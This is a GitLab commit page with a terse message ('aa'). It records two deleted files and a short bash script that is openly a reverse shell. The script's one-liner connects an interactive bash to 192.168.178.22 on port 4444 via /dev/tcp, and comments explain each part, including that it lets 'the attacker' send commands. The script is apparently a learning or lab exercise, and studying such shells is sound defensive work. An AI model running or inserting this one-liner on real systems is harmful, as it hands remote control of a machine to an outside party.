Skip to content
Snippets Groups Projects
Commit 6fd8126c authored by Martinz, David's avatar Martinz, David
Browse files

aa

parent a62fb6a3
Branches main
No related tags found
No related merge requests found
File deleted
File deleted
#!/bin/bash
echo "Reverse shell starting..."
bash -i >& /dev/tcp/192.168.178.22/4444 0>&1
# bash -i:
# Starts an interactive bash shell
# >& /dev/tcp/192.168.178.22/4444:
# /dev/tcp/192.168.178.22/4444 is a special Linux file that creates a TCP connection to the specified IP address (192.168.178.22) and port (4444).
# 0>&1:
# allowing the attacker to send commands to the shell.
\ No newline at end of file
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment